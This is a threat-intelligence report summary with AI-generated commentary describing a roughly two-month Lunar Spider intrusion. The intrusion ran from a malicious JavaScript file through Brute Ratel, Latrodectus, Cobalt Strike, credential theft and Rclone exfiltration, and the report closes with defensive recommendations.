From a Single Click: How Lunar Spider Enabled a Near Two-Month Intrusion

SUMMARY :

A user executed a malicious JavaScript file linked to Lunar Spider, initiating a two-month intrusion. The file downloaded a Brute Ratel DLL, which then injected Latrodectus malware. The threat actor used various tools including Cobalt Strike, BackConnect, and a custom .NET backdoor for persistence and lateral movement. They harvested credentials from multiple sources and exfiltrated data using Rclone. The intrusion lasted nearly two months with intermittent C2 connections, discovery, lateral movement, and data theft. Despite comprehensive access to critical infrastructure, no ransomware deployment was observed.

OPENCTI LABELS :

cobalt-strike,lateral-movement,data-exfiltration,credential-harvesting,javascript,brute ratel c4,backconnect,latrodectus,brute-ratel,cobalt strike


AI COMMENTARY :

1. Executive Summary

The report titled “From a Single Click: How Lunar Spider Enabled a Near Two-Month Intrusion” details a sophisticated attack that began when a user executed a malicious JavaScript file attributed to the Lunar Spider threat actor. This initial execution led to the download of a Brute Ratel C4 DLL and the subsequent injection of the Latrodectus malware. Over a period approaching two months, the attacker leveraged tools such as Cobalt Strike, BackConnect and a custom .NET backdoor to maintain persistence, perform lateral movement and harvest credentials. Ultimately, data exfiltration was carried out using Rclone, yet no ransomware was deployed despite broad access to critical infrastructure assets.

2. Initial Access via Malicious JavaScript

The intrusion chain began when a crafted JavaScript payload was delivered to the victim environment, most likely through a phishing email or compromised web resource. Upon execution, the script fetched a Brute Ratel C4 DLL, marking the transition from a simple client-side exploit to an advanced post-exploitation framework. This single click set off a cascade of actions that enabled the threat actor to establish a foothold and escalate privileges within the network.

3. Deployment of Brute Ratel C4 and Latrodectus

Once the Brute Ratel C4 DLL was loaded into memory, the adversary used its powerful capabilities to inject Latrodectus malware into critical processes. Latrodectus provided stealthy backdoor access, allowing the hacker to issue remote commands while evading endpoint detection. The combination of Brute Ratel’s modular design and Latrodectus’s code injection techniques delivered a versatile platform for automated reconnaissance, credential dumping and future payload deliveries.

4. Use of Cobalt Strike, BackConnect and Custom .NET Backdoor

With initial access established, the attacker deployed Cobalt Strike beacons to perform command and control over secure channels. They supplemented this with BackConnect proxies to obscure their origin and pivoted deeper into the network. A bespoke .NET backdoor was installed to ensure persistent access; this component was designed to reload during system restarts and maintain intermittent communication with the actor’s C2 infrastructure, complicating incident response efforts.

5. Credential Harvesting and Lateral Movement

During the intrusion, the adversary extracted credentials from multiple sources, including Windows credential stores, browser caches and Active Directory queries. Armed with these credentials, they executed lateral movement across hosts and domains, using legitimate administrative tools and built-in protocols to blend in with normal traffic. The coordinated use of credential-harvesting techniques and lateral-movement tactics ensured that critical systems could be accessed without triggering conventional alarms.

6. Data Exfiltration with Rclone

After mapping valuable data repositories, the threat actor leveraged Rclone to transfer sensitive files to external storage endpoints. Rclone’s versatility in handling numerous cloud services made it an ideal choice for exfiltration, as it can mimic routine cloud backup operations. Throughout the exfiltration phase, network monitoring solutions recorded high-volume outbound transfers, but by the time alerts were generated, the attacker had already siphoned significant volumes of data.

7. Persistence, Intermittent C2 and Mitigation Strategies

The attack persisted intermittently for nearly two months, characterized by sporadic C2 check-ins, systematic discovery of new assets and continued data theft. Despite full access to critical infrastructure, the actor refrained from deploying ransomware, instead focusing on espionage and data collection. To defend against similar intrusions, organizations should implement robust JavaScript file inspection, enforce strict application control policies, deploy advanced endpoint detection and response tools, monitor anomalous credential usage and segment critical networks. Regular threat hunting and timely patch management will further reduce the risk of extended dwell time and large-scale data exfiltration.


OPEN NETMANAGEIT OPENCTI REPORT LINK!


Use public read only username and password on login page.

NOTE : Use Public READ only user credentials on login page banner.


From a Single Click: How Lunar Spider Enabled a Near Two-Month Intrusion